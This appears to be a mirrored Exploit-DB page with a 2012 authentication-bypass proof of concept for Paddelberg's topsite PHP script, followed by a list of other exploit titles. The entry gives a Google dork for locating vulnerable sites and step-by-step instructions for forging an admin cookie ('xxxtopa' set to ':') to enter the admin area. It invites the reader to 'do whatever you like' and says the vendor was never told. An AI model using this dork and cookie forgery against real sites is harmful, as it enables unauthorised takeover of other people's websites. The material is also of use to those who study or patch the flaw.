Paddelberg Topsite Script – Authentication Bypass

Exploit Database
11 阅读

作者： Christian Inci

日期： 2012-01-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18340/

# Exploit Title: Paddelberg's topsite-script admin auth bypass.
# Google Dork: intext:"powered by php scripte webmaster resource"
# Date: 8. 1. 2012
# Author: Christian Inci
# Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/
# Version: <= 1.23 (22. 9. 2007)
# Tested on: 1.23
# Vendor response: None, as I didn't contacted them.

PoC/Exploit:
1.: Open a random cookie editor.
2.: Create a cookie, as usually:
2.1: Set the host name.
2.2: Set the path name. (e.g.: "[script-base-path]/admin/")
2.3: Set the cookie name to "xxxtopa".
2.4: Set the cookie value to ":".
2.5: Save it.
3.: Visit the following URL: "[script-base-url]/admin/". (This won't work if the directory is "protected" with a .htaccess file.)
4.: Do whatever you like to do here. (Have fun!)

last Exploits
Paddelberg Topsite Script – Authentication Bypass的更多信息

OpenCart – Cross-Site Request Forgery (Change User Password)：
WordPress Plugin RSVPMaker 2.5.4 – Persistent Cross-Site Scripting：
Proofpoint Protection Server 5.5.5 – ‘process.cgi’ Cross-Site Scripting：
opencart 1.5.2.1 – Multiple Vulnerabilities：
V-SOL GPON/EPON OLT Platform 2.03 – Remote Privilege Escalation：
Plume CMS 1.2.4 – Multiple Persistent Cross-Site Scripting Vulnerabilities：
Parodia 6.8 – ’employer-profile.asp’ SQL Injection：
Balbooa Joomla Forms Builder 2.0.6 – SQL Injection (Unauthenticated)：